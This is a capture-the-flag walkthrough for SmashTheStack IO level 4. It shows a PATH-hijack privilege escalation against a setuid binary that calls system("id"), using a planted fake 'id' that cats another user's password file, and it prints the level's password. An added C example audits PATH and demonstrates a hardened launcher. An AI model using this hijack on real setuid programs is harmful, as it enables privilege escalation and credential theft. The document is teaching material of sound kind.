Level 4 SmashTheStack Walkthrough

So, after a busy week of school and National Cyber League I finally got a chance to work on level 4.
Again, for level 4 we are given an executable binary and a C source code file. This time, when we run the binary all it does is give us a list of UIDs and GIDs. Note the euid field: the binary runs with level 5 permissions.

level4@io:/levels$ ./level04
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1005(level5),1004(level4),1029(nosu)

Interesting. Ok, so now let’s look at the source code.

#include <stdlib.h>

int main() {
	
	system("id");

	return 0;
}

Looks like all it does is call system() with id as its argument.
After researching a little and reading the man page, we find out that system() hands its argument to the shell (/bin/sh -c), and the shell finds the program named in the argument by searching from left to right through a list of directories held in an environment variable called PATH. According to Wikipedia,

“PATH is an environment variable on Unix-like operating systems, DOS, OS/2, and Microsoft Windows, specifying a set of directories where executable programs are located.”

If it finds the specified file within one of those directories it will execute it.
In this case, id is being passed in, and the shell started by system() searches through the directories defined in PATH until it finds id in /usr/bin.
With an echo command we can see which directories the server has defined in our PATH variable.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

So now it becomes clear that we must modify the id program so that it prints the .pass file located in /home/level5. When we go inside /usr/bin and try to modify it in VIM to cat the password file it looks like we are unable to because we don’t have the correct permissions. So now what?

Before we proceed further, remember that the shell run by system() finds the program specified in its argument by searching from left to right through the set of directories defined in the PATH environment variable.
So what we try now is to create a program called id in a directory where we are allowed to write files, and put that directory at the beginning of the PATH variable. This lets our program “catch” the call to id when we run the level04 binary, before the real id is ever reached.

Based on the previous levels, we can assume that we have access to a /tmp/level4 directory which we can modify files in. After changing into that directory, we open up a new C file in VIM and write a simple replacement id program that prints out the contents of the password file.

#include <stdlib.h>   /* system() is declared here, not in stdio.h */

int main()
{
    /* Runs instead of the real id because /tmp/level4 is first in PATH */
    system("cat /home/level5/.pass");
    return 0;
}

Then we compile it.

level4@io:/tmp/level4$ gcc -o id id.c

Our last step is to put this directory at the front of the PATH variable.
We do this using the following command. (PATH is already exported by the shell, so a plain assignment is enough for child processes such as level04 to see the new value.)

level4@io:/tmp/level4$ PATH=/tmp/level4:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Placing /tmp/level4 at the beginning forces the shell to search there first. When our id program is found in that directory, the search stops there and the original /usr/bin/id is never run.
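As an added example (not part of the original walkthrough or the level04 source), the C program below reproduces the left-to-right PATH lookup that system("id") depends on, audits each PATH entry the way a defender would (absolute, not writable by group or others), and shows the hardened way to run id from a privileged program: an absolute path, a fixed environment, and execve() instead of a shell. The demonstration builds its own constructed, world-writable scratch directory under /tmp holding a harmless fake id; it assumes /tmp is writable, and run_id_hardened() assumes /usr/bin/id exists.

```c
/* Added example: PATH lookup as performed for system("cmd"), a PATH audit,
 * and a hardened launcher. Not the level04 source or the wargame's code. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Walk PATH left to right and return the first DIR/cmd that is an executable
 * regular file, as /bin/sh does for a bare command name. Returns a malloc'd
 * string or NULL. Empty PATH entries (which the shell treats as ".") are
 * skipped here for simplicity. */
char *resolve_in_path(const char *cmd, const char *path)
{
    if (!cmd || !path || strchr(cmd, '/')) return NULL; /* only bare names are searched */
    char *copy = strdup(path);
    if (!copy) return NULL;
    char *result = NULL, *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        char candidate[4096];
        snprintf(candidate, sizeof candidate, "%s/%s", dir, cmd);
        struct stat st;
        if (stat(candidate, &st) == 0 && S_ISREG(st.st_mode) && access(candidate, X_OK) == 0) {
            result = strdup(candidate);
            break; /* first hit wins; later directories are never consulted */
        }
    }
    free(copy);
    return result;
}

/* A PATH entry is acceptable for a privileged program only if it is an
 * absolute directory that group and others cannot write to; otherwise anyone
 * can drop their own "id" there, exactly as this level does in /tmp/level4. */
int path_entry_is_trusted(const char *dir)
{
    struct stat st;
    if (!dir || dir[0] != '/') return 0;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Hardened equivalent of the level's system("id"): absolute program path, a
 * fixed minimal environment, no shell. Returns the child's exit status or -1. */
int run_id_hardened(void)
{
    char *const argv[] = { "id", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* caller's PATH is ignored */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/usr/bin/id", argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed scenario: a world-writable directory holding an executable named
 * "id", placed ahead of the system directories in PATH. Returns 1 if the fake
 * wins the lookup and the directory fails the trust audit. */
int demo_path_hijack_lookup(void)
{
    char tmpl[] = "/tmp/pathdemo.XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (!dir) return 0;
    chmod(dir, 0777); /* mimic a shared, writable scratch directory */
    char fake[4200];
    snprintf(fake, sizeof fake, "%s/id", dir);
    int fd = open(fake, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0) return 0;
    const char script[] = "#!/bin/sh\necho constructed fake id\n"; /* harmless stand-in */
    if (write(fd, script, sizeof script - 1) < 0) { close(fd); return 0; }
    close(fd);

    char path[4300];
    snprintf(path, sizeof path, "%s:/usr/bin:/bin", dir);
    char *hit = resolve_in_path("id", path);
    int ok = hit && strcmp(hit, fake) == 0 && !path_entry_is_trusted(dir);
    free(hit);
    unlink(fake);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("fake id shadows the real one: %s\n", demo_path_hijack_lookup() ? "yes" : "no");
    printf("/usr/bin trusted: %d\n", path_entry_is_trusted("/usr/bin"));
    printf("hardened id exit status: %d\n", run_id_hardened());
    return 0;
}
```

The audit in path_entry_is_trusted() is the check a setuid program (or a sysadmin reviewing one) should apply before trusting an inherited PATH; the cleaner fix, shown in run_id_hardened(), is not to trust the caller's environment at all.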

Now when we run the level04 binary we should get the password.

level4@io:/levels$ ./level04
Zx5VdzACNMY9lQ

And there you have it! Onto level 5…

– JW
